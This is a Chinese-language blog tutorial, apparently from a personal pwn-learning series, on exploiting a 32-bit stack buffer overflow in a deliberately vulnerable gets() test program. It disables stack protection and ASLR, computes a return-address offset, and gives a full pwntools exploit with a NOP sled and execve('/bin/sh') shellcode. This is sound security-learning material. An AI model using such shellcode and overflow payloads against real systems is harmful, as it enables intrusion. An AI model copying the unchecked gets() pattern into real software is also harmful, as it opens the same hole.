

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/newtubiao.png">
  <link rel="icon" href="/img/newtubiao.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Asteri5m">
  <meta name="keywords" content="">
  <meta name="description" content="在挖掘和利用漏洞的时候，会遇见没有没有system函数的时候，无法执行system(&quot;&#x2F;bin&#x2F;sh&quot;)，此时，需要构造自己的shellcode 0x00 准备工作随手写一个作为测试使用 12345678910#include&lt;stdio.h&gt;#include&lt;string.h&gt;int main()&amp;#123;	char buf[128];	gets(b">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn入门到放弃3-没有system之构造自己的shellcode">
<meta property="og:url" content="http://asteri5m.icu/archives/pwn%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%833-%E6%B2%A1%E6%9C%89system%E4%B9%8B%E6%9E%84%E9%80%A0%E8%87%AA%E5%B7%B1%E7%9A%84shellcode.html">
<meta property="og:site_name" content="Asteri5m">
<meta property="og:description" content="在挖掘和利用漏洞的时候，会遇见没有没有system函数的时候，无法执行system(&quot;&#x2F;bin&#x2F;sh&quot;)，此时，需要构造自己的shellcode 0x00 准备工作随手写一个作为测试使用 12345678910#include&lt;stdio.h&gt;#include&lt;string.h&gt;int main()&amp;#123;	char buf[128];	gets(b">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220307153425078.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220307162022849.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220307163417633.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220307170717335.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220307164804214.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220307171649410.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220308002223674.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220308002510468.png">
<meta property="og:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220308002705370.png">
<meta property="article:published_time" content="2022-03-07T10:34:21.000Z">
<meta property="article:modified_time" content="2022-03-09T07:41:22.007Z">
<meta property="article:author" content="Asteri5m">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220307153425078.png">
  
    <meta name="baidu-site-verification" content="code-GBSY8p4qe6" />
  
  <title>pwn入门到放弃3-没有system之构造自己的shellcode - Asteri5m</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/atom-one-dark.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/aplayer@1.10.0/dist/APlayer.min.css">
<link rel="stylesheet" href="/xm_custom/custom.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"asteri5m.icu","root":"/","version":"1.8.12","typing":{"enable":true,"typeSpeed":120,"cursorChar":"_","loop":true},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":3},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"5INqyf5xMrWdsn0whn39qjsu-gzGzoHsz","app_key":"6UTAOxyJnjvDwHX3PJagKMg9","server_url":"https://5inqyf5x.lc-cn-n1-shared.com","path":"window.location.pathname"}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Asteri5m</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/guestbook/">
                <i class="iconfont icon-note"></i>
                留言板
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" false
         style="background: url('/img/none.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="pwn入门到放弃3-没有system之构造自己的shellcode">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-03-07 18:34" pubdate>
        2022年3月7日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.3k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      10 分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">pwn入门到放弃3-没有system之构造自己的shellcode</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：几秒前
                
              </p>
            
            <div class="markdown-body">
              <p>在挖掘和利用漏洞的时候，会遇见没有没有system函数的时候，无法执行<code>system(&quot;/bin/sh&quot;)</code>，此时，需要构造自己的shellcode</p>
<h2 id="0x00-准备工作"><a href="#0x00-准备工作" class="headerlink" title="0x00 准备工作"></a>0x00 准备工作</h2><p>随手写一个作为测试使用</p>
<figure class="highlight c"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span><span class="hljs-meta-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span><span class="hljs-meta-string">&lt;string.h&gt;</span></span><br><br><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>	<span class="hljs-keyword">char</span> buf[<span class="hljs-number">128</span>];<br>	gets(buf);<br>	<span class="hljs-built_in">puts</span>(buf);<br>	<span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></div></td></tr></table></figure>

<p>编译成32位的程序，同时注意关闭栈保护和打开栈的可执行</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash">clang -m32 -fno-stack-protector -z execstack [源文件名] -o [可执行文件名]<br></code></pre></div></td></tr></table></figure>

<p>clang和gcc都行，我个人喜欢clang所以用clang了，参数说明：</p>
<ul>
<li>-m32：使用32位编译</li>
<li>-fno-stack-protector：关闭栈保护</li>
<li>-z execstack：启用栈上代码可执行</li>
</ul>
<p>关闭操作系统的地址空间随机化（ASLR），这是针对栈溢出漏洞被操作系统广泛采用的防御措施。关闭该防御来降低学习复现的难度。需要root执行。</p>
<figure class="highlight bash"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs bash"><span class="hljs-comment"># 注意，下面是临时修改方案，系统重启后会被重置为2</span><br><span class="hljs-built_in">echo</span> 0 &gt; /proc/sys/kernel/randomize_va_space<br></code></pre></div></td></tr></table></figure>

<h2 id="0x10-构造shell"><a href="#0x10-构造shell" class="headerlink" title="0x10 构造shell"></a>0x10 构造shell</h2><h3 id="0x11-分析程序"><a href="#0x11-分析程序" class="headerlink" title="0x11 分析程序"></a>0x11 分析程序</h3><p>将上面的源码按照上面的编译命令编译然后运行程序，输入一段较长的字符，查看情况</p>
<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220307153425078.png" srcset="/img/loading.gif" lazyload></p>
<p>经典段错误，说明是存在栈溢出的。</p>
<p>根据源码也很容易知道，输入的字符串长度大于128，就会溢出。现在就只需要找到字符串的起始地址和覆盖到返回地址所需要的偏移。</p>
<p>因为编译时使用了-z execstack参数，也就是说可以在栈上执行代码，所以只需要在栈上面构造获取shell的指令，然后更改返回值跳转到执行shellcode，就可以成功获取shell了。</p>
<h3 id="0x12-什么是shellcode"><a href="#0x12-什么是shellcode" class="headerlink" title="0x12 什么是shellcode"></a>0x12 什么是shellcode</h3><p>shellcode就是一串可以返回shell的机器指令码，在linux上典型的有：<a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/13312">Linux&#x2F;x86 - execve(&#x2F;bin&#x2F;sh) + Polymorphic Shellcode (48 bytes)</a>，对应代码为：</p>
<figure class="highlight c"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs c"><span class="hljs-keyword">char</span> shellcode[] =  <span class="hljs-string">&quot;\xeb\x11\x5e\x31\xc9\xb1\x32\x80&quot;</span><br>                    <span class="hljs-string">&quot;\x6c\x0e\xff\x01\x80\xe9\x01\x75&quot;</span><br>                    <span class="hljs-string">&quot;\xf6\xeb\x05\xe8\xea\xff\xff\xff&quot;</span><br>                    <span class="hljs-string">&quot;\x32\xc1\x51\x69\x30\x30\x74\x69&quot;</span><br>                    <span class="hljs-string">&quot;\x69\x30\x63\x6a\x6f\x8a\xe4\x51&quot;</span><br>                    <span class="hljs-string">&quot;\x54\x8a\xe2\x9a\xb1\x0c\xce\x81&quot;</span>;<br></code></pre></div></td></tr></table></figure>

<p>shellcode本质就是就是一串机器码，执行后提供shell。</p>
<h3 id="0x13-攻击实现"><a href="#0x13-攻击实现" class="headerlink" title="0x13 攻击实现"></a>0x13 攻击实现</h3><p>根据上面的分析，我们需要如下计算步骤：</p>
<ol>
<li>找出buf变量地址。我们可以从buf一开始就写入shellcode，也可以填写一段padding后再写入shellcode。记录shellcode填充的位置。</li>
<li>找出main函数返回地址。</li>
<li>计算main函数返回地址与buf变量地址2者的偏移量，在填充完shellcode后，再填充差值长度的padding，使得可以覆盖返回地址，并将返回地址指向shellcode所在位置。</li>
</ol>
<p>先找buf的地址，打开IDA使用远程调试，在gets函数下断点，然后运行到return的位置，此时分析</p>
<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220307162022849.png" srcset="/img/loading.gif" lazyload></p>
<p>可以看到三个关键信息：</p>
<ul>
<li>根据 <code>mov [ebp+var_8c],eax</code> 可以猜测偏移量</li>
<li>buf的起始地址为 0xFFFFCFE4</li>
<li>通过堆栈视图得到返回地址为 0xFFFFD06C</li>
</ul>
<p>计算得到偏移为 0x88（136），再次测试，这次输入140个a（刚好覆盖完返回地址）</p>
<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220307163417633.png" srcset="/img/loading.gif" lazyload></p>
<p>验证成功，得到偏移136个字节，开始构造攻击字符串，最后的地址应该为小端序，也就是反着的</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python">buf_addr = <span class="hljs-number">0xFFFFCFE4</span><br>offset = <span class="hljs-number">136</span><br><br>shellcode =  <span class="hljs-string">b&quot;\xeb\x11\x5e\x31\xc9\xb1\x32\x80&quot;</span><br>               <span class="hljs-string">&quot;\x6c\x0e\xff\x01\x80\xe9\x01\x75&quot;</span><br>               <span class="hljs-string">&quot;\xf6\xeb\x05\xe8\xea\xff\xff\xff&quot;</span><br>               <span class="hljs-string">&quot;\x32\xc1\x51\x69\x30\x30\x74\x69&quot;</span><br>               <span class="hljs-string">&quot;\x69\x30\x63\x6a\x6f\x8a\xe4\x51&quot;</span><br>               <span class="hljs-string">&quot;\x54\x8a\xe2\x9a\xb1\x0c\xce\x81&quot;</span>;<br>                    <br>payload = shellcode + <span class="hljs-string">b&#x27;a&#x27;</span>*(offset-<span class="hljs-number">48</span>) + <span class="hljs-string">b&#x27;\xE4\xCF\xFF\xFF&#x27;</span><br></code></pre></div></td></tr></table></figure>

<p>再次调试，因为包含了不可读的字符串，所以除了填充的部分，其他部分都需要修改内存</p>
<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220307170717335.png" srcset="/img/loading.gif" lazyload></p>
<p>成功了，那么使用pwntools实现一次</p>
<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220307164804214.png" srcset="/img/loading.gif" lazyload></p>
<p>出错了，原因分析，这是因为gdb在运行时，会往栈上添加许多进程使用的环境变量，导致栈的地址变低了，但是直接运行时，没有这些环境变量，所以地址会比gdb中查询获得的高。对于这个问题，我们可以NOP链来绕过。</p>
<p>解决办法：使用NOP填充。NOP指令，也称作“空指令”，在x86的CPU中机器码为0x90(144)。NOP不执行操作，但占一个程序步。也就是说当遇到NOP指令的时候，程序不会做任何事，而是继续执行下一条指令。</p>
<p>因此可以改造一下payload，在头部放上一段NOP指令，然后再跟上shellcode，并适当偏移之前的buf起始地址，这样当返回地址指向这段NOP指令中的任意一个地址时，因为NOP空指令的关系，会一直找下去，直到遇到shellcode，这样就大大提高了命中率。对于栈可执行程序而言，这是一种很有效的命中方式。</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python">payload = <span class="hljs-string">b&#x27;\x90&#x27;</span>*<span class="hljs-number">40</span> + shellcode + <span class="hljs-string">b&#x27;a&#x27;</span>*(offset-<span class="hljs-number">48</span>-<span class="hljs-number">40</span>) + <span class="hljs-string">b&#x27;\xE4\xCF\xFF\xFF&#x27;</span><br></code></pre></div></td></tr></table></figure>

<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220307171649410.png" srcset="/img/loading.gif" lazyload></p>
<p>成功！</p>
<h3 id="0x14-完整exp"><a href="#0x14-完整exp" class="headerlink" title="0x14 完整exp"></a>0x14 完整exp</h3><figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level = <span class="hljs-string">&quot;debug&quot;</span> <span class="hljs-comment">#show debug information</span><br><br>p = process(<span class="hljs-string">&#x27;./pwn_test&#x27;</span>)<br><br>buf_addr = <span class="hljs-number">0xFFFFCFE4</span><br>offset = <span class="hljs-number">136</span><br><br>shellcode =  <span class="hljs-string">b&quot;\xeb\x11\x5e\x31\xc9\xb1\x32\x80\</span><br><span class="hljs-string">\x6c\x0e\xff\x01\x80\xe9\x01\x75\</span><br><span class="hljs-string">\xf6\xeb\x05\xe8\xea\xff\xff\xff\</span><br><span class="hljs-string">\x32\xc1\x51\x69\x30\x30\x74\x69\</span><br><span class="hljs-string">\x69\x30\x63\x6a\x6f\x8a\xe4\x51\</span><br><span class="hljs-string">\x54\x8a\xe2\x9a\xb1\x0c\xce\x81&quot;</span><br>                    <br>payload = <span class="hljs-string">b&#x27;\x90&#x27;</span>*<span class="hljs-number">40</span> + shellcode + <span class="hljs-string">b&#x27;a&#x27;</span>*(offset-<span class="hljs-number">48</span>-<span class="hljs-number">40</span>) + p32(buf_addr)<br><br>p.sendline(payload)<br>p.interactive()<br></code></pre></div></td></tr></table></figure>

<h2 id="0x20-总结"><a href="#0x20-总结" class="headerlink" title="0x20 总结"></a>0x20 总结</h2><p>没有system时如何自己构造一个shell的：</p>
<ol>
<li>先找出偏移量（可以利用cyclic工具）</li>
<li>输入偏移量+4长度的字符，获得此时buf的起始地址</li>
<li>构造payload：</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python">payload = NOP*N + shellcode + padding*(偏移量-shellcode长度-NOP长度) + (shellcode地址)<br></code></pre></div></td></tr></table></figure>

<h3 id="0x21-补充"><a href="#0x21-补充" class="headerlink" title="0x21 补充"></a>0x21 补充</h3><p>快速找到偏移的方法：使用pwntools的cyclic方法，先生成一段长度合适的有序字符串</p>
<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220308002223674.png" srcset="/img/loading.gif" lazyload></p>
<p>这里直接使用gdb调试即可</p>
<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220308002510468.png" srcset="/img/loading.gif" lazyload></p>
<p>返回pwntools，使用 <code>cyclic_find()</code> 语句直接获取偏移</p>
<p><img src="https://gitee.com/Asteri5m/wd_img/raw/master/img/image-20220308002705370.png" srcset="/img/loading.gif" lazyload></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Pwn%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">Pwn基础知识</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Pwn/">Pwn</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/archives/pwn%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%834-ROP%E7%BB%95%E8%BF%87%E6%A0%88%E5%8F%AF%E6%89%A7%E8%A1%8C%E4%BF%9D%E6%8A%A4%E4%B8%8EGOT%E8%A1%A8%E5%8A%AB%E6%8C%81.html">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">pwn入门到放弃4-ROP绕过栈可执行保护与GOT表劫持</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/archives/bugku%E7%BB%83%E9%A2%98%E8%AE%B0%E5%BD%952%20timer%5B%E9%98%BF%E9%87%8Cctf%5D&amp;%E9%80%86%E5%90%91%E5%85%A5%E9%97%A8.html">
                        <span class="hidden-mobile">bugku练题记录2 timer[阿里ctf]&逆向入门</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/gh/HCLonely/Valine@latest/dist/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"5INqyf5xMrWdsn0whn39qjsu-gzGzoHsz","appKey":"6UTAOxyJnjvDwHX3PJagKMg9","path":"window.location.pathname","placeholder":"输入QQ号我就能获取你的企鹅昵称和头像啦~","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true,"tagMeta":["博主","小伙伴","访客"],"master":"3bbfd45c0631973d5196327805f62511","friends":["2012b2da9e0852350b42a9c21823f3cf","641f794b535aea2ebe2ad543ec35e2f8"]},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          Fluid.plugins.initFancyBox('#valine .vcontent img:not(.vemoji)');
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
      <div class="col-lg-7 mx-auto nopadding-x-md">
        <div class="container custom mx-auto">
          <meting-js server="netease" type="playlist" id="5413938648" fixed="true" theme="#aa55ff"></meting-js>
        </div>
      </div>
    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>使用Hexo框架</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>精品Fluid主题</span></a><br> <span id="timeDate">天数载入中</span><span id="times">...</span><br> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        蜀ICP备2021029058号
      </a>
    </span>
    
      
        <span>
          <a
            href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=51011202000479"
            rel="nofollow noopener"
            class="beian-police"
            target="_blank"
          >
            
              <span style="visibility: hidden; width: 0">|</span>
              <img src="/img/beian.png" srcset="/img/loading.gif" lazyload alt="police-icon"/>
            
            <span>川公网安备 51011202000479号</span>
          </a>
        </span>
      
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  

  

  

  

  

  




  
<script src="//cdn.jsdelivr.net/npm/aplayer@1.10.0/dist/APlayer.min.js"></script>
<script src="//cdn.jsdelivr.net/npm/meting@2.0.1/dist/Meting.min.js"></script>
<script src="/xm_custom/custom.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
